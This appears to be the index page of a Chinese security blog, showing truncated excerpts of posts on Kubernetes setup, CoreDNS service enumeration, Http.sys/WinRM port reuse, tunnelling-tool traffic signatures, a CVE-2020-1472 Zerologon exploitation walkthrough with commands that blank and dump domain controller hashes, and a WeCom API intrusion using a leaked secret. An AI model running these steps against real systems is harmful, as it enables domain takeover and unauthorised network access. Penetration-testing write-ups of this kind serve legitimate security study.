Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick StartCreate a new post1$ hexo new "My New Post"
More info: Writing
Run server1$ hexo server
More info: Server
Generate static files1$ hexo generate
More info: Generating
Deploy to remote sites1$ hexo deploy
More info: Deployment
自签名集群搭建
1. 生成2048位的ca.key1openssl genrsa -out ca.key 2048
2. 在 ca.key 文件的基础上,生成 ca.crt 文件1openssl req -x509 -new -nodes -key ca.key -subj "/CN=175.27.155.72" -days 3650 -out ca.crt
3. 生成apiserver.key1openssl genrsa -out apiserver.key 2048
4. 创建一个用于生成证书签名请求(CSR)的配置文件1234567891011121314151617181920212223242526272829303132333435[ req ]default_bits = 2048prompt = nodefault_md = sha256req_extensions = req_extdistinguished_name = dn[ dn ]C = CNST = BeijingL = BeijingO = KubernetesOU = KubernetesC ...
利用 CoreDNS 枚举集群Service & Port
利用 CoreDNS 枚举集群Service & Port1. 发现历程看代码的过程中,发现在/pkg/dnsutil/reverse.go存在 关于in-addr.arpa的定义
跟了一下,走到 /plugin/hosts/hosts.go ,发现CoreDNS是支持PTR解析记录的
看下k8s_external包,这个包是处理svc域名的一些操作。109行发现K8s插件也是支持ptr记录的,CoreDNS的使用过程是集群内部的域名,coreDNS分发至kubedns,集群外的域名则通过coreDNS进行递归。
2. 利用手法在公共DNS服务器上,很少会有ip存在PTR解析记录,而集群内部所有的域名都是通过Service进行管理,这样也就说明,如果CoreDNS的K8s插件若支持PTR记录,那么集群内部就可以通过ip来获取svc域名
正常情况下,查询一个service的A记录是这样的
1<SVC>.<NAMESPACE>.svc.cluster.local
若PTR可用,我们将会得到 ...
对Http.sys利用的一些总结
本文一切操作都在管理员权限之下
1. 什么是http.syshttp.sys是一个Windows系统的核心组件,能够让任何应用程序通过它提供的接口,以http协议进行信息通讯。微软在Win2003加入了Http.sys,用于侦听http流量并根据URL进行处理,允许任意用户进程共享专用于HTTP流量的TCP端口,也就是说,多个程序可以使用同一端口进行http的监听,而Http.sys充当了nginx的⻆色。通过netsh命令可以对http.sys的命名空间进行一系列操作。比如说IIS服务器,它的最底层就是HTTP.sys驱动,HTTP.sys有两个特点
允许端口服用,可以让多个程序使用同一个端口进行监听
对HOST敏感,可以通过HOST进行分发流量。
系统当中会有一些默认的http.sys的保留注册项,如下
而目前业内的普遍用法是使用5985端口的WinRM注册项,将其迁移到80端口进行复用,由于winrm服务在系统自带的命名空间当中已经被注册,命名空间与winrm程序之间已经有对应了,所以将winrm开在80端口就可以了,由于存在IIS的服务器IIS的80端口占用也是在Ht ...
Kubernetes 环境搭建
所有节点 绑定Hosts1234567# 不绑定会导致初始化失败[root@Perng-Node2 ~]# cat /etc/hosts127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4::1 localhost localhost.localdomain localhost6 localhost6.localdomain6192.168.159.100 Perng-Master 192.168.159.110 Perng-Node1 192.168.159.120 Perng-Node2
所有节点 安装Docker12345678910111213#安装yum-utils[root@Perng-Master ~]# yum install yum-utils[root@Perng-Master ~]# yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/ ...
HTTPS四层协议代理服务器搭建
HTTP代理在白皮书当中氛围两种,一种为RFC 7230的HTTP代理,以及RFC 7231 的 CONNECT 方法代理,前者只可以通过七层的HTTP的请求包,后者即为HTTPS代理,可通过CONNECT方法走四层协议包。
0.1 利用组件 Squid0.11 直接 yum 下载安装1yum install squid
0.12 配置文件
配置文件中存在acl的概念,将acl放开1-65535即全部端口放行,如果不需要全放行可根据自己需求进行使用,例如,搭建squid的目的为代理访问 22 端口,则开放acl 22端口,以此类推。
其次重要的是acl放行 CONNECT 方法,这是走四层包的核心功能。
修改 此字段,将不在ssl端口的connect方法放行。
修改此字段,改为允许。
可以通过四层包
常见HackNetTools流量分析
本文的所有工具都采用未加密模式,以此来进行流量分析
Protocoltcp
udp
区别
形象的说
Tool 1 EarthWorm
最大的特征就是 没有特征 ,灯下黑,下面加密的流量是我访问百度的流量。
Tool 2 Frptcp 模式由于是tcp模式,所以所有的包都在同一个tcp流当中
通过分析该流,发现存在一些特征
特征 握手包在程序刚运行的时候,客户端会向服务器端发送一个json格式的握手包,用来验证双方的版本、架构的信息
发现这些信息了,就说明frp已经上线了。
kcp 模式Frp作者在描述中这么写道
1kcp协议可以在恶劣的网络环境中提供更优的隧道连接
开始分析
首先,kcp协议基于udp协议,在百科上有这样的描述
1KCP是一个快速可靠协议,能以比TCP浪费10%-20%的带宽的代价,换取平均延迟降低30%-40%,且最大延迟降低三倍的传输效果。
由于使用的是udp协议进行传输,那么作者所说的kcp可以在恶劣环境中提供更优的隧道服务也不难理解,毕竟服务态度决定了服务速度。
特征 握手包跟tcp协议一样,udp协议在第一步的时候也会发出一个验证握手包 ...
CVE-2020-1472 域内提权漏洞
0x00 前序环境验证poc
1https://github.com/SecuraBV/CVE-2020-1472
打空exp
1https://github.com/risksense/zerologon
impacket包
1https://github.com/SecureAuthCorp/impacket
impacket包下载后在其目录下执行
1python setup.py install
测试环境 Windows Server 2008 ip 192.168.10.10 name DC
0x01 测试是否可以打空本地Hash1python .\zerologon_tester.py DC_NAME DC_IP
检测到以下结果,本地Hash可以被打空
0x02 利用zerologon把本地Hash打空1python .\set_empty_pw.py DC_NAME DC_IP
出现如下结果,本地Hash已被打空
0x03 使用空密码拽出DC上的Hash利用impacket包中examples目录下的secretsdump.py
1python secre ...
记一次从企业微信到内网遨游
构造请求进入企业微信1.1 通过CorpID与secret获取access_token1https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=id&corpsecret=secrect
调用该接口,获取access_token
1.2 通过acess_token获取部门ID1https://open.work.weixin.qq.com/devtool/query?e=301002
将access_token进行输入,获取部门信息
1.3 构造请求,将自己的微信号加入企业微信将自己的微信信息POST进创建成员的URL
1https://qyapi.weixin.qq.com/cgi-bin/user/create?access_token=ACCESS_TOKEN
123456{ "userid": "masterperng", "name": "perng", "department": [par ...